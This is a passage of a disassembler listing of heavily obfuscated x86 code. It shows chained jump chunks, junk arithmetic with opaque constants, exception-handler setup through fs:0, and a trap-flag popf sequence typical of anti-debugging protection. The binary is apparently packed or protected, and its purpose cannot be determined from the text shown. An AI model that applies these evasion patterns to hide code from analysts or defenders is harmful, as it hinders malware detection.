sub_42CEA4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push eax
ror eax, 0Fh
mov ds:dword_42D128, eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_42CEC1: ; CODE XREF: sub_42380D+11�j
jmp loc_42886B
; END OF FUNCTION CHUNK FOR sub_42380D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B669
loc_42CEC6: ; CODE XREF: sub_42B669-6CCE�j
xor eax, eax
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_42B669
; ---------------------------------------------------------------------------
loc_42CECA: ; CODE XREF: _0182ofla:0042D7C0�j
jmp loc_429422
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B5C2
loc_42CECF: ; CODE XREF: sub_42B5C2+5�j
jmp loc_42737D
; END OF FUNCTION CHUNK FOR sub_42B5C2
; =============== S U B R O U T I N E =======================================
sub_42CED4 proc near ; CODE XREF: sub_42D52E:loc_4266DD�p
push dword ptr fs:0
mov fs:0, esp
jmp near ptr word_425686
sub_42CED4 endp
; ---------------------------------------------------------------------------
loc_42CEE5: ; CODE XREF: _0182ofla:00425BE8�j
jl loc_42CB65
; START OF FUNCTION CHUNK FOR sub_428729
loc_42CEEB: ; CODE XREF: sub_428729+276F�j
jmp loc_42E964
; END OF FUNCTION CHUNK FOR sub_428729
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C89
loc_42CEF0: ; CODE XREF: sub_425C89+6�j
jmp loc_42E3EE
; END OF FUNCTION CHUNK FOR sub_425C89
; ---------------------------------------------------------------------------
pushf
not ecx
jmp loc_42CB65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426020
loc_42CEFD: ; CODE XREF: sub_426020+7384�j
jz loc_42AEFC
jmp loc_427F51
; END OF FUNCTION CHUNK FOR sub_426020
; ---------------------------------------------------------------------------
loc_42CF08: ; CODE XREF: _0182ofla:004293BD�j
; _0182ofla:0042DB79�j
push ecx
jmp loc_425008
; ---------------------------------------------------------------------------
xor edx, 5A84A004h
xor edi, 16E22DE7h
jmp sub_428EB9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428AC9
loc_42CF1F: ; CODE XREF: sub_428AC9+6060�j
mov ebx, 246011BDh
and ebx, 66F20508h
jmp loc_42E153
; END OF FUNCTION CHUNK FOR sub_428AC9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42CF2F: ; CODE XREF: sub_4253F4+14A6�j
jnz loc_428BC9
jmp loc_42CFA6
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424184
loc_42CF3A: ; CODE XREF: sub_424184:loc_42D2A4�j
mov dword ptr [ebp+eax*4-70h], 73257325h
inc dword ptr [ebp-8]
cmp dword ptr [ebp-8], 19h
jnz loc_427C56
jmp loc_42691F
; END OF FUNCTION CHUNK FOR sub_424184
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42966F
loc_42CF54: ; CODE XREF: sub_42966F-6033�j
sub edx, 0BC7BCC0Eh
sbb ebx, 86884B79h
pushf
loc_42CF61: ; CODE XREF: sub_425DA5:loc_42DA3D�j
call sub_423FCD
test al, al
jz loc_4279B1
jmp loc_4242D3
; END OF FUNCTION CHUNK FOR sub_42966F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E5F8
loc_42CF73: ; CODE XREF: sub_42E5F8-4E6C�j
jz loc_42A729
jmp loc_42E858
; END OF FUNCTION CHUNK FOR sub_42E5F8
; ---------------------------------------------------------------------------
loc_42CF7E: ; CODE XREF: _0182ofla:00424369�j
xchg eax, [esp]
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291BA
loc_42CF82: ; CODE XREF: sub_4291BA-3E43�j
jmp loc_428097
; END OF FUNCTION CHUNK FOR sub_4291BA
; ---------------------------------------------------------------------------
loc_42CF87: ; DATA XREF: _0182ofla:00424364�o
pop edx
xchg edi, [esp]
mov ecx, edi
pop edi
jmp loc_426F18
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_42CF93: ; CODE XREF: sub_42660C-229D�j
xchg eax, [esp+0]
or eax, 100h
xchg eax, [esp+0]
popf
nop
jmp loc_42E928
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42CFA6: ; CODE XREF: sub_4253F4+7B41�j
cmp eax, edi
jmp loc_426472
; END OF FUNCTION CHUNK FOR sub_4253F4
; =============== S U B R O U T I N E =======================================
sub_42CFAD proc near
; FUNCTION CHUNK AT 00428542 SIZE 00000005 BYTES
add eax, ebp
add eax, 94E2727Eh
mov eax, [eax]
push eax
jmp loc_428542
sub_42CFAD endp
; ---------------------------------------------------------------------------
sbb edi, eax
rol esi, 11h
jmp sub_42E1C8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4C6
loc_42CFC7: ; CODE XREF: sub_42A4C6+39E4�j
popf
push offset sub_427E42
jmp loc_42A477
; END OF FUNCTION CHUNK FOR sub_42A4C6
; ---------------------------------------------------------------------------
loc_42CFD2: ; CODE XREF: _0182ofla:loc_425F86�j
; _0182ofla:loc_4277CA�j
xchg edx, [esp]
jmp nullsub_220
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_42CFDA: ; CODE XREF: sub_423FCD:loc_42B485�j
jnb loc_424438
or eax, 339A7D1h
rol ebp, 1Bh
cdq
and edi, edx
jmp loc_42DC90
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B43
loc_42CFF1: ; CODE XREF: sub_423B43:loc_42B228�j
add esi, 0DE08B7FCh
jmp loc_425BB2
; END OF FUNCTION CHUNK FOR sub_423B43
; ---------------------------------------------------------------------------
loc_42CFFC: ; DATA XREF: sub_428B26+E�o
setz al
call sub_42ECAD
pop ecx
jmp loc_426374
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42D00A: ; CODE XREF: sub_42798F:loc_4270F9�j
mov eax, [ebp+8]
jmp loc_426D18
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_42D012: ; CODE XREF: sub_42380D+9945�j
sub ebp, 0ABDA6EBDh
jnp loc_423363
loc_42D01E: ; CODE XREF: sub_42380D:loc_42886B�j
mov eax, 62h
call sub_4265C0
jmp loc_428A55
; END OF FUNCTION CHUNK FOR sub_42380D
; =============== S U B R O U T I N E =======================================
sub_42D02D proc near ; CODE XREF: sub_42EAB7:loc_428C9D�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423678 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426F22 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004278F0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042B3F8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B58D SIZE 00000005 BYTES
push dword ptr fs:0
mov fs:0, esp
jmp loc_42B3F8
sub_42D02D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42D03E proc near ; DATA XREF: sub_427D89+16�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423C99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424D02 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00426D77 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428B7E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428BED SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042ADB0 SIZE 00000005 BYTES
xchg esi, [esp+0]
jmp loc_423C99
sub_42D03E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABB7
loc_42D046: ; CODE XREF: sub_42ABB7+2F6C�j
xor al, al
or eax, eax
jnz loc_424636
jmp loc_42EB18
; END OF FUNCTION CHUNK FOR sub_42ABB7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_58. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42D056 proc near ; CODE XREF: sub_425063:loc_424680�p
; _0182ofla:00427349�j
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004236BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423A52 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00423DEC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00424042 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424DCD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424F26 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004256DB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00425F8B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004263AD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00426678 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00426DEE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00427D21 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428340 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00428428 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042858C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428676 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042887D SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00428908 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00428D92 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429319 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042987B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00429991 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00429C49 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00429E7E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042A3A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A574 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A7AE SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0042A84E SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0042A8E3 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042AF93 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042B3A8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042C98A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042CBF6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D414 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042D45F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042D864 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042DE1B SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042E038 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042E636 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EC88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ECC5 SIZE 0000000B BYTES
xchg ecx, [esp+0]
pop ecx
jnb loc_428340
call sub_423FCD
test al, al
jz loc_425F8B
jmp loc_428676
sub_42D056 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_199. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_42D073: ; CODE XREF: sub_425B00+54B5�j
jmp loc_429088
; END OF FUNCTION CHUNK FOR sub_425B00
; ---------------------------------------------------------------------------
loc_42D078: ; CODE XREF: _0182ofla:0042C6AE�j
xchg ebp, [edi]
pop ecx
and esi, 0F37F01FFh
; START OF FUNCTION CHUNK FOR sub_427259
loc_42D081: ; CODE XREF: sub_427259:loc_42C69A�j
add ecx, 7DBA5CA0h
jmp loc_42DD3B
; END OF FUNCTION CHUNK FOR sub_427259
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424707
loc_42D08C: ; CODE XREF: sub_424707+705�j
xor eax, 4B47A071h
add eax, 0D4CBC009h
xchg eax, [esp+0]
jmp sub_4265C0
; END OF FUNCTION CHUNK FOR sub_424707
; ---------------------------------------------------------------------------
loc_42D0A0: ; CODE XREF: _0182ofla:0042B043�j
push ecx
jmp loc_425467
; ---------------------------------------------------------------------------
loc_42D0A6: ; CODE XREF: _0182ofla:0042EB3C�j
pop edx
add edx, 2E30AFEBh
loc_42D0AD: ; CODE XREF: _0182ofla:loc_424C5B�j
add edx, ebp
add edx, 182A94FCh
mov [edx], eax
pop edx
jmp loc_428ED6
; ---------------------------------------------------------------------------
loc_42D0BD: ; CODE XREF: _0182ofla:0042EC9F�j
test eax, 4
loc_42D0C3: ; CODE XREF: _0182ofla:loc_429AAB�j
jmp loc_42E84D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42349B
loc_42D0C8: ; CODE XREF: sub_42349B+13�j
sub eax, [ebp-0Ch]
call sub_42EAB7
loc_42D0D0: ; CODE XREF: _0182ofla:004271CC�j
jmp loc_42668B
; END OF FUNCTION CHUNK FOR sub_42349B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42940E
loc_42D0D5: ; CODE XREF: sub_42940E:loc_42E8D8�j
push edx
push 7717E54Eh
mov edx, offset sub_42D0E4
xchg edx, [esp+8+var_8]
retn
; END OF FUNCTION CHUNK FOR sub_42940E
; =============== S U B R O U T I N E =======================================
sub_42D0E4 proc near ; DATA XREF: sub_42940E+3CCD�o
xor edx, 0E889AD61h
add edx, 60A41B5Bh
xchg edx, [esp+0]
jmp sub_425E4D
sub_42D0E4 endp
; ---------------------------------------------------------------------------
loc_42D0F8: ; CODE XREF: _0182ofla:0042785A�j
push offset sub_42CB53
jmp locret_427A84
; ---------------------------------------------------------------------------
dw 3C11h
dword_42D104 dd 0FEFCA86Eh ; DATA XREF: sub_42DF41-2FC9�w
; sub_42DF41�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42D108: ; CODE XREF: sub_428D63+2600�j
jmp loc_424FF5
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
db 0DCh, 19h, 87h
dword_42D110 dd 38DDF9E7h ; DATA XREF: sub_425E4D:loc_42B048�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4267F8
loc_42D114: ; CODE XREF: sub_4267F8+2C0B�j
jmp loc_423CF5
; END OF FUNCTION CHUNK FOR sub_4267F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428041
loc_42D119: ; CODE XREF: sub_428041-249F�j
jmp nullsub_129
; END OF FUNCTION CHUNK FOR sub_428041
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42D11E: ; CODE XREF: sub_428F20-486D�j
jmp loc_4244D7
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
db 87h
dword_42D124 dd 0E79C9077h ; DATA XREF: sub_42D833-6503�r
; sub_42D833+B0�w ...
dword_42D128 dd 7B94EFA9h ; DATA XREF: _0182ofla:00423100�w
; sub_428A5F+5�r ...
; ---------------------------------------------------------------------------
sub eax, 95F06D41h
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42D132: ; CODE XREF: sub_428D63-3581�j
jmp sub_4296F0
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427445
loc_42D137: ; CODE XREF: sub_427445:loc_42B480�j
pop ebp
push 48DF4696h
pop eax
sub eax, 0BB045D89h
or eax, 5D9525DCh
jmp loc_427536
; END OF FUNCTION CHUNK FOR sub_427445
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_152. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_42D150: ; CODE XREF: sub_42380D:loc_42C274�j
xor ebp, esi
jmp loc_42D012
; END OF FUNCTION CHUNK FOR sub_42380D
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426571
loc_42D158: ; CODE XREF: sub_426571+13BE�j
jmp loc_42DBB1
; END OF FUNCTION CHUNK FOR sub_426571
; =============== S U B R O U T I N E =======================================
sub_42D15D proc near ; CODE XREF: sub_42660C:loc_42543A�p
; sub_42938A+2FDC�j
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
; FUNCTION CHUNK AT 00423EA4 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00426537 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00427210 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428A1F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00429533 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0042DA97 SIZE 00000005 BYTES
jb loc_423EA4
call sub_427445
push ebp
jmp loc_427210
sub_42D15D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_42D16E: ; CODE XREF: sub_42B15E-7981�j
jno loc_425CB7
sbb ebp, 2C56D6DFh
loc_42D17A: ; CODE XREF: sub_427CDE:loc_42EC76�j
push eax
push 21DBAE85h
pop eax
or eax, 0A8A0C69Ch
jmp loc_426E04
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_42D18C: ; CODE XREF: sub_4282B8+3E8A�j
sbb ebp, 0AEE190Ah
mov eax, [ebx]
test edx, esi
jmp loc_42D7C5
; END OF FUNCTION CHUNK FOR sub_4282B8
; =============== S U B R O U T I N E =======================================
sub_42D19B proc near ; CODE XREF: _0182ofla:004273E7�j
; sub_428A39+6�p
; FUNCTION CHUNK AT 0042AD3C SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042E1AB SIZE 0000000F BYTES
xchg edi, [esp+0]
pop edi
pop esi
mov esi, [eax]
push ecx
push 13AFF857h
pop ecx
jmp loc_42AD3C
sub_42D19B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D1AE proc near ; CODE XREF: sub_425629:loc_42754D�j
; FUNCTION CHUNK AT 00425D75 SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
push offset loc_427643
jmp loc_425D75
sub_42D1AE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429597
loc_42D1BC: ; CODE XREF: sub_429597:loc_42E6E3�j
push 0
call sub_42B5C2
locret_42D1C3: ; CODE XREF: _0182ofla:0042DAFE�j
retn
; END OF FUNCTION CHUNK FOR sub_429597
; =============== S U B R O U T I N E =======================================
sub_42D1C4 proc near ; CODE XREF: _0182ofla:0042A4FB�p
xchg edx, [esp+0]
mov edx, [esp+0]
push ebx
call sub_426319
loc_42D1D0: ; CODE XREF: sub_42C197:loc_42359B�j
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
call sub_42EAF0
loc_42D1DB: ; CODE XREF: sub_427D2B+C�j
jmp nullsub_134
sub_42D1C4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E6E
loc_42D1E0: ; CODE XREF: sub_424E6E+34B�j
; sub_42D978+6�j
rol eax, 12h
call sub_42CE60
loc_42D1E8: ; CODE XREF: sub_424707+15AB�j
jmp loc_423141
; END OF FUNCTION CHUNK FOR sub_424E6E
; ---------------------------------------------------------------------------
loc_42D1ED: ; CODE XREF: _0182ofla:00424429�j
jmp loc_426B90
; ---------------------------------------------------------------------------
dec ebp
mov ecx, 3D114530h ; DATA XREF: sub_42E282+6�o
; START OF FUNCTION CHUNK FOR sub_4240FC
loc_42D1F8: ; CODE XREF: sub_4240FC-6BF�j
jmp loc_42610F
; END OF FUNCTION CHUNK FOR sub_4240FC
; ---------------------------------------------------------------------------
db 0A8h, 0F4h, 0D5h
dd 3D114530h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42380D
loc_42D204: ; CODE XREF: sub_42380D+54C3�j
jmp loc_427F69
; END OF FUNCTION CHUNK FOR sub_42380D
; ---------------------------------------------------------------------------
loc_42D209: ; CODE XREF: _0182ofla:00427FFC�j
jmp locret_42A7AD
; ---------------------------------------------------------------------------
dw 9EAEh
dword_42D210 dd 0 ; DATA XREF: sub_429BA2+6�w
; sub_42461C+A6FF�r
dword_42D214 dd 0 ; DATA XREF: sub_425B6E+6�r
; sub_425C55+7�r ...
; ---------------------------------------------------------------------------
loc_42D218: ; CODE XREF: _0182ofla:00424AD2�j
jmp sub_42935B
; ---------------------------------------------------------------------------
db 4Fh, 0B3h, 96h
dword_42D220 dd 8576C82Ch, 196669E0h, 8D364617h, 5015E800h ; DATA XREF: sub_42AAF8-65AC�o
dword_42D230 dd 0 ; DATA XREF: sub_427D17+3�w sub_428D2D�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C379
loc_42D234: ; CODE XREF: sub_42C379+106F�j
jmp loc_429DE3
; END OF FUNCTION CHUNK FOR sub_42C379
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423395
loc_42D239: ; CODE XREF: sub_423395+767D�j
jmp nullsub_135
; END OF FUNCTION CHUNK FOR sub_423395
; ---------------------------------------------------------------------------
dw 9919h
dword_42D240 dd 0 ; DATA XREF: sub_42A00A+7�r
; sub_42AB3E+172F�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4C6
loc_42D244: ; CODE XREF: sub_42A4C6+1B�j
jmp loc_4252DE
; END OF FUNCTION CHUNK FOR sub_42A4C6
; ---------------------------------------------------------------------------
db 41h, 0FBh, 39h
dword_42D24C dd 0 ; DATA XREF: _0182ofla:0042DC4E�w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42768C
loc_42D250: ; CODE XREF: sub_42768C:loc_429348�j
add edx, ecx
pop eax
sbb ebx, 3AB2673Eh
jmp loc_42C2D9
; END OF FUNCTION CHUNK FOR sub_42768C
; ---------------------------------------------------------------------------
loc_42D25E: ; CODE XREF: _0182ofla:loc_428171�j
jnz loc_423D59
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
xor edx, edx
jmp loc_42A4AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1B2
loc_42D274: ; CODE XREF: sub_42C1B2-7D70�j
jnp loc_429376
xor eax, ebp
loc_42D27C: ; CODE XREF: sub_42C1B2:loc_423748�j
mov eax, [ebp-4]
call nullsub_10
jmp loc_4239DD
; END OF FUNCTION CHUNK FOR sub_42C1B2
; ---------------------------------------------------------------------------
locret_42D289: ; CODE XREF: _0182ofla:loc_42DC5A�j
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_52. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42326C
loc_42D28B: ; CODE XREF: sub_42326C+B1CB�j
jmp loc_42ADB5
; END OF FUNCTION CHUNK FOR sub_42326C
; ---------------------------------------------------------------------------
loc_42D290: ; CODE XREF: _0182ofla:00424A1E�j
jmp loc_42C8FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C8C0
loc_42D295: ; CODE XREF: _0182ofla:00425993�j
; sub_42C8C0+12�j ...
call sub_42EB4E
loc_42D29A: ; CODE XREF: sub_42A092-219�j
jmp loc_425D4B
; END OF FUNCTION CHUNK FOR sub_42C8C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CC59
loc_42D29F: ; CODE XREF: sub_42CC59-3485�j
jmp loc_4268E2
; END OF FUNCTION CHUNK FOR sub_42CC59
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424184
loc_42D2A4: ; CODE XREF: sub_424184:loc_42328D�j
; sub_4289E4-4F4F�j ...
jmp loc_42CF3A
; END OF FUNCTION CHUNK FOR sub_424184
; =============== S U B R O U T I N E =======================================
sub_42D2A9 proc near ; DATA XREF: sub_425B00:loc_428DDF�o
mov [ebp-20h], eax
jmp loc_42AFA1
sub_42D2A9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_42D2B1: ; CODE XREF: sub_425B00:loc_425B13�j
test byte ptr [ebp-7], 8
jz loc_42C8E0
push ebp
mov eax, [ebp-20h]
call sub_42A51F
jmp loc_42AF9D
; END OF FUNCTION CHUNK FOR sub_425B00
; ---------------------------------------------------------------------------
mov edi, 84788216h
jmp loc_42D54D
; ---------------------------------------------------------------------------
loc_42D2D3: ; CODE XREF: _0182ofla:00426C7D�j
xchg eax, [esp]
mov ebp, eax
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253DC
loc_42D2DA: ; CODE XREF: sub_4253DC-1735�j
rol eax, 6
push eax
call sub_424CD8
jmp nullsub_212
; END OF FUNCTION CHUNK FOR sub_4253DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E6BF
loc_42D2E8: ; CODE XREF: sub_42E6BF:loc_42D374�j
ror edi, 0Ch
sbb edx, ebx
sbb ecx, 8021CABAh
jnz loc_4273DC
jmp loc_42DA8C
; END OF FUNCTION CHUNK FOR sub_42E6BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B43
loc_42D2FE: ; CODE XREF: sub_423B43+B�j
jnz loc_42E005
jmp loc_429DC4
; END OF FUNCTION CHUNK FOR sub_423B43
; ---------------------------------------------------------------------------
loc_42D309: ; CODE XREF: _0182ofla:00427BF6�j
add eax, 4BA97FA6h
mov eax, [eax]
mov ecx, 3FBh
xor edx, edx
div ecx
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42D31A: ; CODE XREF: sub_428D63:loc_42D447�j
mov [ebp-1Ch], edx
push 0C6767D22h
pop eax
jmp loc_4281C8
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9A4
loc_42D328: ; CODE XREF: sub_42D9A4:loc_42B4F9�j
jz loc_42B53E
jmp loc_4238C7
; END OF FUNCTION CHUNK FOR sub_42D9A4
; =============== S U B R O U T I N E =======================================
sub_42D333 proc near ; CODE XREF: _0182ofla:00426CB8�p
; _0182ofla:0042A6BD�j
xchg edi, [esp+0]
pop edi
call sub_42D71D
retn
sub_42D333 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42D33D proc near ; CODE XREF: _0182ofla:004244B2�j
; sub_42E43C+A�p
; FUNCTION CHUNK AT 00426A43 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0042B0C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D945 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042DC64 SIZE 0000000D BYTES
xchg eax, [esp+0]
pop eax
push 3E24A583h
pop eax
add eax, 0C21E2CC9h
mov eax, [eax]
or eax, eax
jnz loc_42DC64
jmp loc_42D945
sub_42D33D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42D35C: ; CODE XREF: sub_42798F+6B60�j
call sub_42D36D
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291F5
loc_42D368: ; CODE XREF: sub_4291F5+9�j
jmp sub_428D17
; END OF FUNCTION CHUNK FOR sub_4291F5
; =============== S U B R O U T I N E =======================================
sub_42D36D proc near ; CODE XREF: sub_42798F:loc_42D35C�p
mov dword ptr [eax], 0
retn
sub_42D36D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E6BF
loc_42D374: ; CODE XREF: sub_42E6BF-6AA�j
jmp loc_42D2E8
; END OF FUNCTION CHUNK FOR sub_42E6BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DBF0
loc_42D379: ; CODE XREF: sub_42DBF0-118F�j
jmp loc_426F91
; END OF FUNCTION CHUNK FOR sub_42DBF0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_42D37E: ; CODE XREF: sub_425B00+12BE�j
pop ecx
mov [ebp-20h], eax
jmp loc_42AFA1
; END OF FUNCTION CHUNK FOR sub_425B00
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D387 proc near ; CODE XREF: sub_425B00+12B9�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0042AAAE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E946 SIZE 00000013 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_4], eax
jmp loc_42AAAE
sub_42D387 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426020
loc_42D395: ; CODE XREF: sub_426020+6�j
pop ebp
mov eax, ds:dword_42E8D4
or eax, eax
jnz loc_4232EC
jmp loc_42CEFD
; END OF FUNCTION CHUNK FOR sub_426020
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_42D3A9: ; CODE XREF: sub_42B15E:loc_429777�j
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 4
jmp loc_42DEF5
